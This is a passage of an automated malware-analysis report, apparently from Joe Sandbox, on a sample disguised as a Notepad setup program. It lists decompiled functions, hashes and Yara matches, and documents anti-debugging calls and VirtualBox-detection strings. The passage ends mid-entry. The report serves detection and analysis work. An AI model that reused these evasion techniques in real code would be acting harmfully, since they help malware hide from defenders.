                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: sqrt
                                      • String ID:
                                      • API String ID: 1201437784-0
                                      • Opcode ID: 510b901532c67414beb63c89f44dafdffb7e5982264c177ff0f98c0639b0246a
                                      • Instruction ID: 0b172926866724bf42b23e7428fe8ce19ccef81841becbe3a1a1947200cabddc
                                      • Opcode Fuzzy Hash: 510b901532c67414beb63c89f44dafdffb7e5982264c177ff0f98c0639b0246a
                                      • Instruction Fuzzy Hash: 97615DB2B083058BC305DF59E58064AF7E1EBC8780F564D6DE484E33A5E77199298BC6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9932 Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 006E9944
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E994B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentInformationQuery
                                      • String ID:
                                      • API String ID: 3953534283-0
                                      • Opcode ID: c514dd71ded820ac0d7dad3d704372dcacb21c3cb86f97758742e4d1bcdf97c0
                                      • Instruction ID: fa2646725272e20460e1659e30ead45c74ce907f4663391b90cb6bb6e84c2f8a
                                      • Opcode Fuzzy Hash: c514dd71ded820ac0d7dad3d704372dcacb21c3cb86f97758742e4d1bcdf97c0
                                      • Instruction Fuzzy Hash: 0BE0C27175034ABBEF108BA19C06BEB33AD9B0075EF100068B701E51C1EAB4DA80D675
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E99C6 Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 006E99D8
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E99DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentInformationQuery
                                      • String ID:
                                      • API String ID: 3953534283-0
                                      • Opcode ID: ee79916bc195a4a8c2dca9ed0103d3ba08d7abe9b1e2c434fdaba3b468880919
                                      • Instruction ID: 03d2962e9706b6d0671f37deb78c7293f5c32a5cd0f569e0d57f096fc39c0d3c
                                      • Opcode Fuzzy Hash: ee79916bc195a4a8c2dca9ed0103d3ba08d7abe9b1e2c434fdaba3b468880919
                                      • Instruction Fuzzy Hash: F1E01272751305F7EB108BA1EC47BEE73ADAB0079DF240159BB05E51C0DAB8DA40D675
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9FDD Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,006EA022), ref: 006E9FF4
                                      • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 006EA015
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: 9c12b51246c3c0b27ade9a710aa2631a9d195fed3dd9ef3e3a08446d6f0809c0
                                      • Instruction ID: 6a94e7786e447df7360c69b9fce3a3761217d309ea55452c662ac2a0508454e9
                                      • Opcode Fuzzy Hash: 9c12b51246c3c0b27ade9a710aa2631a9d195fed3dd9ef3e3a08446d6f0809c0
                                      • Instruction Fuzzy Hash: DDE0DFB0645384BFDB40CBA8ED55BAE7FB3F708304F10008EE801D2A92CAF58944CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9FE9 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,006EA022), ref: 006E9FF4
                                      • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 006EA015
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: 0c6b6e403a71808407493642865b1165b79735d4f0e9ad14befd73290f274de7
                                      • Instruction ID: 6f8513974a7ecec3626218b33d6e28d477d635068ac856b1db75c7a58a7df49d
                                      • Opcode Fuzzy Hash: 0c6b6e403a71808407493642865b1165b79735d4f0e9ad14befd73290f274de7
                                      • Instruction Fuzzy Hash: 66E08C70241304BFD740DBA9E909B9E7BBBE708308F000049F801D2692CAB1AA40CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9587 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000), ref: 006E9593
                                      • CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 006E959A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CheckCurrentDebuggerPresentProcessRemote
                                      • String ID:
                                      • API String ID: 3244773808-0
                                      • Opcode ID: d1f9a6517c6f9e6e06702924e293853d71df09fe0ac8462baaae20c0bfb6ab70
                                      • Instruction ID: e73f60882812de76dc093d97cdd59c0764c0ca55a308575a2e629ba4b4872f54
                                      • Opcode Fuzzy Hash: d1f9a6517c6f9e6e06702924e293853d71df09fe0ac8462baaae20c0bfb6ab70
                                      • Instruction Fuzzy Hash: FAD0CA7191020AEBCB04DBE0E90AADEB7BDAB0420AF501084E501E2210CA78AA00DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E96CA Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,006E96F8), ref: 006E96D1
                                      • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 006E96EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: c8d69ed0c66aa7411ac30acacdf283b18c4252acf3757a6b52df55f23909e9f6
                                      • Instruction ID: 88ad6f558a65e3a0b8c7a46658c14e25e2b8b40acf334c5209eb921a7f5cc018
                                      • Opcode Fuzzy Hash: c8d69ed0c66aa7411ac30acacdf283b18c4252acf3757a6b52df55f23909e9f6
                                      • Instruction Fuzzy Hash: C7D012B03822014FDB548B24DD197A93763E708305F112045AD05C27A1CEB58440CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9716 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,006E973B), ref: 006E971D
                                      • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 006E972F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: dd4335dd3f045400a12686d450a6d1d25e029c8cb9e8c770cf0b8df737415da4
                                      • Instruction ID: 726a4073d4cac80b463d1f2a63f9bafe6f3c9cf33cba40348870a9ef478af52e
                                      • Opcode Fuzzy Hash: dd4335dd3f045400a12686d450a6d1d25e029c8cb9e8c770cf0b8df737415da4
                                      • Instruction Fuzzy Hash: CCC04C746813019BDF449F65EE5DB6A3B77F704705F012801AD0586EB8CFB58194CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC2FF Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: hXMV$hXMV
                                      • API String ID: 0-400149659
                                      • Opcode ID: ad7042868452514f3405e3834078fe3582248539a460e807010c5405dcffb4bf
                                      • Instruction ID: 1f2b31face74edd86cddd9c85f006e5f2f39f958a296007423c98335a3d8f8cd
                                      • Opcode Fuzzy Hash: ad7042868452514f3405e3834078fe3582248539a460e807010c5405dcffb4bf
                                      • Instruction Fuzzy Hash: DAF0CD76E04795EFD7148749DD51BBFFBB8E745B31F30422AF551632C0C27959018AA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB722 Relevance: 2.5, Strings: 2, Instructions: 28COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                      • String ID: vboxservice.exe$vboxtray.exe
                                      • API String ID: 1083639309-1571995788
                                      • Opcode ID: da864cd24bd2a821171fd1f66fed0c9961250d670f62a05f1d3fb58364090947
                                      • Instruction ID: 5d201ff1950091d3304592e6071e611c663c988682be6f82849efe0d01435874
                                      • Opcode Fuzzy Hash: da864cd24bd2a821171fd1f66fed0c9961250d670f62a05f1d3fb58364090947
                                      • Instruction Fuzzy Hash: 85E048766022487AEB115A879C4D9DBBF69EF80365F500079E64166210D3B15D058664
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404207 Relevance: 1.6, APIs: 1, Instructions: 149COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E00404207(signed int __edi, unsigned int __ebp, signed long long __fp0, signed long long _a16, signed int _a20, signed long long _a24, signed int _a28, signed long long _a32, unsigned int _a36, signed int _a40, unsigned int _a44, intOrPtr* _a80, signed long long* _a84) {
				intOrPtr* _t100;
				signed int _t106;
				signed int _t115;
				unsigned int _t122;
				unsigned int _t124;
				unsigned int _t126;
				unsigned int _t130;
				signed int _t133;
				unsigned int _t134;
				signed int _t135;
				unsigned int _t148;
				signed long long* _t150;
				unsigned int _t152;
				signed long long _t153;
				signed long long _t166;

				_t153 = __fp0;
				_t148 = __ebp;
				_t135 = __edi;
				while(1) {
					L1:
					st0 = _t153;
					st0 = _t153;
					st0 = _t153;
					while(1) {
						_t122 = _a20;
						_a36 = (_t148 << 0x00000020 | _t135) << 0x17 ^ _t148;
						_a32 = _t135 << 0x00000017 ^ _t135;
						_t124 = _a36;
						_t115 = _a16;
						_t135 = _a16 ^ (_t122 << 0x00000020 | _a16) >> 0x1a ^ _a32 ^ (_t124 << 0x00000020 | _a32) >> 0x11;
						_t106 = _a20;
						_t148 = _a20 ^ _t122 >> 0x0000001a ^ _t124 ^ _t124 >> 0x00000011;
						_t126 = _t106;
						asm("adc edx, esi");
						_a16 = (_t126 << 0x00000020 | _t115 + _t135) >> 0xb;
						_a20 = _t126 >> 0xb;
						asm("fild qword [esp+0x10]");
						_a16 = _t115;
						_a20 = _t106;
						asm("fxch st0, st1");
						_a24 = _a16 ^ _t115 << 0x00000017;
						_a28 = _a20 ^ (_t106 << 0x00000020 | _t115) << 0x17;
						_t130 = _a28;
						asm("fld1");
						_a16 = _a24 ^ (_t130 << 0x00000020 | _a24) >> 0x11 ^ _t135 ^ (_t148 << 0x00000020 | _t135) >> 0x1a;
						_a20 = _a28 ^ _t130 >> 0x00000011 ^ _t148 ^ _t148 >> 0x0000001a;
						_t133 = _a20;
						asm("adc edx, ebp");
						_t134 = _t133 >> 0xb;
						_t152 = _t134;
						_a40 = (_t133 << 0x00000020 | _a16 + _t135) >> 0xb;
						_a44 = _t134;
						asm("fild qword [esp+0x28]");
						asm("fmulp st3, st0");
						asm("fxch st0, st2");
						_t153 = st1 * st2;
						asm("faddp st1, st0");
						asm("fcomi st0, st3");
						st3 = _t153;
						if(_t152 >= 0) {
							goto L1;
						}
						asm("fldz");
						asm("fxch st0, st3");
						asm("fucomi st0, st3");
						st3 = _t153;
						if(_t152 == 0) {
							if(_t152 == 0) {
								st0 = _t153;
								st0 = _t153;
								st0 = _t153;
								continue;
							} else {
							}
						}
						_a32 = _t153;
						_a24 = _t153;
						asm("fst qword [esp]");
						_a16 = _t153;
						 *0x424fa8 = _t135;
						 *0x424fac = _t148;
						 *0x424fb0 = _a16;
						 *0x424fb4 = _a20;
						L0040A320();
						asm("fdivp st1, st0");
						asm("fldz");
						asm("fucomip st0, st1");
						_t166 = _a32;
						if(_t152 > 0) {
							_a24 = _t166;
							_a16 = _t166;
							 *_t150 = _t166;
							L0040A2E0();
							_t166 = _a24;
							asm("fxch st0, st2");
						} else {
							asm("fxch st0, st2");
							asm("fsqrt");
						}
						asm("fxch st0, st1");
						 *_a84 = _t166 * st0;
						_t100 = _a80;
						asm("fmulp st1, st0");
						 *_t100 = 1;
						return _t100;
					}
				}
			}


















                                      0x00404207
                                      0x00404207
                                      0x00404207
                                      0x00404210
                                      0x00404210
                                      0x00404210
                                      0x00404212
                                      0x00404214
                                      0x00404226
                                      0x00404239
                                      0x00404241
                                      0x00404249
                                      0x0040425c
                                      0x00404262
                                      0x0040427b
                                      0x0040427d
                                      0x00404285
                                      0x00404287
                                      0x00404289
                                      0x00404292
                                      0x00404298
                                      0x0040429e
                                      0x004042a5
                                      0x004042b3
                                      0x004042c3
                                      0x004042c5
                                      0x004042cb
                                      0x004042d3
                                      0x004042e9
                                      0x00404309
                                      0x00404311
                                      0x00404315
                                      0x0040431b
                                      0x00404321
                                      0x00404321
                                      0x00404324
                                      0x00404328
                                      0x0040432c
                                      0x00404330
                                      0x00404332
                                      0x0040433e
                                      0x00404340
                                      0x00404342
                                      0x00404344
                                      0x00404346
                                      0x00000000
                                      0x00000000
                                      0x0040434c
                                      0x0040434e
                                      0x00404350
                                      0x00404352
                                      0x00404354
                                      0x00404356
                                      0x00404220
                                      0x00404222
                                      0x00404224
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404356
                                      0x00404360
                                      0x0040436c
                                      0x00404370
                                      0x00404373
                                      0x00404377
                                      0x0040437d
                                      0x00404383
                                      0x00404389
                                      0x0040438f
                                      0x0040439e
                                      0x004043a0
                                      0x004043a2
                                      0x004043a8
                                      0x004043ac
                                      0x004043e4
                                      0x004043e8
                                      0x004043ec
                                      0x004043ef
                                      0x004043f8
                                      0x004043fc
                                      0x004043ae
                                      0x004043ae
                                      0x004043b0
                                      0x004043b0
                                      0x004043b4
                                      0x004043ba
                                      0x004043bc
                                      0x004043c0
                                      0x004043c2
                                      0x004043cf
                                      0x004043cf
                                      0x00404226

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5a2c67faa2c93ca964f023fe5fadf5eb5667684dd5dd7312c7ebc354b889e355
                                      • Instruction ID: b7ec35658c69be80a705284070d6739f48c03669a893b925ad2fe9f30268616b
                                      • Opcode Fuzzy Hash: 5a2c67faa2c93ca964f023fe5fadf5eb5667684dd5dd7312c7ebc354b889e355
                                      • Instruction Fuzzy Hash: 91515CB2F083058BC305DE69D98024AF7E1EBC8780F564D2DE485E37A5FA719D198BC6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404218 Relevance: 1.6, APIs: 1, Instructions: 148COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E00404218(signed int __edi, unsigned int __ebp, signed long long __fp0, signed long long _a16, signed int _a20, signed long long _a24, signed int _a28, signed long long _a32, unsigned int _a36, signed int _a40, unsigned int _a44, intOrPtr* _a80, signed long long* _a84) {
				intOrPtr* _t100;
				signed int _t106;
				signed int _t115;
				unsigned int _t122;
				unsigned int _t124;
				unsigned int _t126;
				unsigned int _t130;
				signed int _t133;
				unsigned int _t134;
				signed int _t135;
				unsigned int _t148;
				signed long long* _t150;
				unsigned int _t152;
				signed long long _t153;
				signed long long _t166;

				_t153 = __fp0;
				_t148 = __ebp;
				_t135 = __edi;
				do {
					st0 = _t153;
					st0 = _t153;
					st0 = _t153;
					while(1) {
						_t122 = _a20;
						_a36 = (_t148 << 0x00000020 | _t135) << 0x17 ^ _t148;
						_a32 = _t135 << 0x00000017 ^ _t135;
						_t124 = _a36;
						_t115 = _a16;
						_t135 = _a16 ^ (_t122 << 0x00000020 | _a16) >> 0x1a ^ _a32 ^ (_t124 << 0x00000020 | _a32) >> 0x11;
						_t106 = _a20;
						_t148 = _a20 ^ _t122 >> 0x0000001a ^ _t124 ^ _t124 >> 0x00000011;
						_t126 = _t106;
						asm("adc edx, esi");
						_a16 = (_t126 << 0x00000020 | _t115 + _t135) >> 0xb;
						_a20 = _t126 >> 0xb;
						asm("fild qword [esp+0x10]");
						_a16 = _t115;
						_a20 = _t106;
						asm("fxch st0, st1");
						_a24 = _a16 ^ _t115 << 0x00000017;
						_a28 = _a20 ^ (_t106 << 0x00000020 | _t115) << 0x17;
						_t130 = _a28;
						asm("fld1");
						_a16 = _a24 ^ (_t130 << 0x00000020 | _a24) >> 0x11 ^ _t135 ^ (_t148 << 0x00000020 | _t135) >> 0x1a;
						_a20 = _a28 ^ _t130 >> 0x00000011 ^ _t148 ^ _t148 >> 0x0000001a;
						_t133 = _a20;
						asm("adc edx, ebp");
						_t134 = _t133 >> 0xb;
						_t152 = _t134;
						_a40 = (_t133 << 0x00000020 | _a16 + _t135) >> 0xb;
						_a44 = _t134;
						asm("fild qword [esp+0x28]");
						asm("fmulp st3, st0");
						asm("fxch st0, st2");
						_t153 = st1 * st2;
						asm("faddp st1, st0");
						asm("fcomi st0, st3");
						st3 = _t153;
						if(_t152 < 0) {
							break;
						}
						st0 = _t153;
						st0 = _t153;
						st0 = _t153;
					}
					asm("fldz");
					asm("fxch st0, st3");
					asm("fucomi st0, st3");
					st3 = _t153;
					if(_t152 == 0) {
						goto L5;
					}
					L7:
					_a32 = _t153;
					_a24 = _t153;
					asm("fst qword [esp]");
					_a16 = _t153;
					 *0x424fa8 = _t135;
					 *0x424fac = _t148;
					 *0x424fb0 = _a16;
					 *0x424fb4 = _a20;
					L0040A320();
					asm("fdivp st1, st0");
					asm("fldz");
					asm("fucomip st0, st1");
					_t166 = _a32;
					if(_t152 > 0) {
						_a24 = _t166;
						_a16 = _t166;
						 *_t150 = _t166;
						L0040A2E0();
						_t166 = _a24;
						asm("fxch st0, st2");
					} else {
						asm("fxch st0, st2");
						asm("fsqrt");
					}
					asm("fxch st0, st1");
					 *_a84 = _t166 * st0;
					_t100 = _a80;
					asm("fmulp st1, st0");
					 *_t100 = 1;
					return _t100;
					L5:
				} while (_t152 == 0);
				goto L7;
			}


















                                      0x00404218
                                      0x00404218
                                      0x00404218
                                      0x00404220
                                      0x00404220
                                      0x00404222
                                      0x00404224
                                      0x00404226
                                      0x00404239
                                      0x00404241
                                      0x00404249
                                      0x0040425c
                                      0x00404262
                                      0x0040427b
                                      0x0040427d
                                      0x00404285
                                      0x00404287
                                      0x00404289
                                      0x00404292
                                      0x00404298
                                      0x0040429e
                                      0x004042a5
                                      0x004042b3
                                      0x004042c3
                                      0x004042c5
                                      0x004042cb
                                      0x004042d3
                                      0x004042e9
                                      0x00404309
                                      0x00404311
                                      0x00404315
                                      0x0040431b
                                      0x00404321
                                      0x00404321
                                      0x00404324
                                      0x00404328
                                      0x0040432c
                                      0x00404330
                                      0x00404332
                                      0x0040433e
                                      0x00404340
                                      0x00404342
                                      0x00404344
                                      0x00404346
                                      0x00000000
                                      0x00000000
                                      0x00404210
                                      0x00404212
                                      0x00404214
                                      0x00404214
                                      0x0040434c
                                      0x0040434e
                                      0x00404350
                                      0x00404352
                                      0x00404354
                                      0x00000000
                                      0x00000000
                                      0x00404360
                                      0x00404360
                                      0x0040436c
                                      0x00404370
                                      0x00404373
                                      0x00404377
                                      0x0040437d
                                      0x00404383
                                      0x00404389
                                      0x0040438f
                                      0x0040439e
                                      0x004043a0
                                      0x004043a2
                                      0x004043a8
                                      0x004043ac
                                      0x004043e4
                                      0x004043e8
                                      0x004043ec
                                      0x004043ef
                                      0x004043f8
                                      0x004043fc
                                      0x004043ae
                                      0x004043ae
                                      0x004043b0
                                      0x004043b0
                                      0x004043b4
                                      0x004043ba
                                      0x004043bc
                                      0x004043c0
                                      0x004043c2
                                      0x004043cf
                                      0x00404356
                                      0x00404356
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d168a499b76dc36a51d3e3325bd0ea59d4ccdfa650b9c039e9272f353ecb675a
                                      • Instruction ID: 257f6033f5ac05b1f416a5031ae779b70a228f64a38ca2020c3ebbfe45dc0ed7
                                      • Opcode Fuzzy Hash: d168a499b76dc36a51d3e3325bd0ea59d4ccdfa650b9c039e9272f353ecb675a
                                      • Instruction Fuzzy Hash: E6515CB2F083068BC305DE69D98024AF7E1EBC8740F564D2DE484E37A5FA719D198BC6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9601 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: ac1190b1ac409dad433bc65c19169be42cd408ec514bf2bfdd76027fd8d017f3
                                      • Instruction ID: 7e37d55cd6f4fc24d4d1f94f489c7b493716e129e169a27b481f3a34debe4e29
                                      • Opcode Fuzzy Hash: ac1190b1ac409dad433bc65c19169be42cd408ec514bf2bfdd76027fd8d017f3
                                      • Instruction Fuzzy Hash: AAE065B6615754FFD7108B8DCD46B6ABBACF741B75F100719F122927C0D774250086A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9A8B Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 006E9A99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationQuerySystem
                                      • String ID:
                                      • API String ID: 3562636166-0
                                      • Opcode ID: 3d82f797814264fc7bdd75fb98ba2796dd46509c0d2b7658ec1231f248b092c7
                                      • Instruction ID: ea7eead21ebaf3e251df5cfb73a8ef3831af18335541f08be55d9f352d1baec8
                                      • Opcode Fuzzy Hash: 3d82f797814264fc7bdd75fb98ba2796dd46509c0d2b7658ec1231f248b092c7
                                      • Instruction Fuzzy Hash: 06E01261A5438C3DFB1186959C0BF9A76E94F00758F0051A9A501E42C5E6E5DD848361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E4016 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,00000018,?,00000004,006E3FB1), ref: 006E4029
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      • Opcode ID: 123e4657b3a27426f7f27084b8cad94337b2a13be8aac613b0e311a5378db81d
                                      • Instruction ID: a0cff632571c7a54850d73864620b6d9361886c44494a2613c755e69988ded40
                                      • Opcode Fuzzy Hash: 123e4657b3a27426f7f27084b8cad94337b2a13be8aac613b0e311a5378db81d
                                      • Instruction Fuzzy Hash: 2CD0C77619010DBBDF01CF51DC42ED93BACAB04749F005111B605D6090D675D7489BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E5E73 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: kernel32.dll
                                      • API String ID: 0-1793498882
                                      • Opcode ID: 1b38b52a736695656a5a5060570de7cb8f579053bd7f829a01c1bc0a8f11b491
                                      • Instruction ID: ab2849e1882ae6ba460fd7e5c22cf4283c75f21873056d6cc877f50b34918d8b
                                      • Opcode Fuzzy Hash: 1b38b52a736695656a5a5060570de7cb8f579053bd7f829a01c1bc0a8f11b491
                                      • Instruction Fuzzy Hash: B5F0AF32602B94EBCB20CF4ED98196AF7F9EF04358715092AE846E7701E370FE0087A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA998 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
